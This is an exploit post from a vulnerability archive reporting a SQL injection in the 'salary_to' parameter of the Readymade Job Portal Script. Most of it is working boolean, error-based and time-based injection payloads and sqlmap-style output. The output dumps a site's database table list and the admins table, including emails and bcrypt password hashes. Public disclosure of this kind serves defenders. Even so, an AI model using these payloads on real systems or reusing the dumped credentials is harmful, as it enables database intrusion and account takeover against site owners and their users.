Readymade Job Portal Script SQL Injection

2022.08.14
Credit: CraCkEr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr │ │ : │ Website : i-netsolution.com │ │ │ │ Vendor : i-Net Solution │ │ │ │ Software : Readymade Job Portal Script │ │ Job Portal is a website that serves │ │ Vuln Type: Remote SQL Injection │ │ as a bridge between employers │ │ Method : GET │ │ and job seekers │ │ Impact : Database Access │ │ │ │ │ │ │ │────────────────────────────────────────────┘ └─────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, chamanwal, ix7 CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ GET parameter 'salary_to' is vulnerable. --- Parameter: salary_to (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: search=&salary_from=222&salary_to=333) AND 3040=3040 AND (4873=4873 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: search=&salary_from=222&salary_to=333) AND (SELECT 3022 FROM(SELECT COUNT(*),CONCAT(0x71706a7671,(SELECT (ELT(3022=3022,1))),0x7162716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (1802=1802 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: search=&salary_from=222&salary_to=333) AND (SELECT 5992 FROM (SELECT(SLEEP(10)))wrGn) AND (8437=8437 --- [+] Starting the Attack [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL >= 5.0 (MariaDB fork) [INFO] fetching current database current database: 'theminsall_jobportal_db' [INFO] fetching tables for database: 'theminsall_jobportal_db' Database: theminsall_jobportal_db [72 tables] +----------------------------------+ | admin_password_resets | | admins | | applicant_messages | | blog_categories | | blogs | | career_levels | | cities | | cms | | cms_content | | companies | | company_messages | | company_password_resets | | contact_messages | | countries | | countries_details | | degree_levels | | degree_types | | failed_jobs | | faqs | | favourite_applicants | | favourites_company | | favourites_job | | functional_areas | | genders | | industries | | job_alerts | | job_apply | | job_apply_rejected | | job_experiences | | job_shifts | | job_skills | | job_titles | | job_types | | jobs | | language_levels | | languages | | major_subjects | | manage_job_skills | | marital_statuses | | migrations | | ownership_types | | packages | | password_resets | | payu_transactions | | profile_cvs | | profile_education_major_subjects | | profile_educations | | profile_experiences | | profile_languages | | profile_projects | | profile_skills | | profile_summaries | | queue_jobs | | report_abuse_company_messages | | report_abuse_messages | | result_types | | roles | | salary_periods | | send_to_friend_messages | | seo | | site_settings | | sliders | | states | | subscriptions | | testimonials | | unlocked_users | | user_messages | | users | | videos | | widget_pages | | widgets | | widgets_data | +----------------------------------+ [INFO] fetching columns for table 'admins' in database 'theminsall_jobportal_db' Database: theminsall_jobportal_db Table: admins [8 columns] +----------------+------------------+ | Column | Type | +----------------+------------------+ | created_at | timestamp | | email | varchar(191) | | id | int(10) unsigned | | name | varchar(191) | | password | varchar(191) | | remember_token | varchar(100) | | role_id | int(11) | | updated_at | timestamp | +----------------+------------------+ [INFO] fetching entries of column(s) 'email,id,name,password' for table 'admins' in database 'theminsall_jobportal_db' Database: theminsall_jobportal_db Table: admins [3 entries] +----+--------------------+--------------------------------------------------------------+-----------+ | id | email | password | name | +----+--------------------+--------------------------------------------------------------+-----------+ | 3 | buyer@buyer.com | $2y$10$47ig/2wfYDc6EVg0iVnvp.l.jC0APqEVUjR7P6PFYTEhbNFzHPJ66 | Buyer | | 4 | sub@jobsportal.com | $2y$10$uxtmaI.4Xrb3EEaLW6uvBuOKXyWCNtZ05pQFMwd6Jd1G0k9ZlKV/C | Sub Admin | | 5 | admin@gmail.com | $2y$10$AvprFLS9PQXUs.3QVwyYZejm4FVYlKM02.nykVF.dVxS9D82I8ZLG | Admin | +----+--------------------+--------------------------------------------------------------+-----------+ Possible Algorithms: bcrypt $2*$, Blowfish (Unix) [-] Done


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top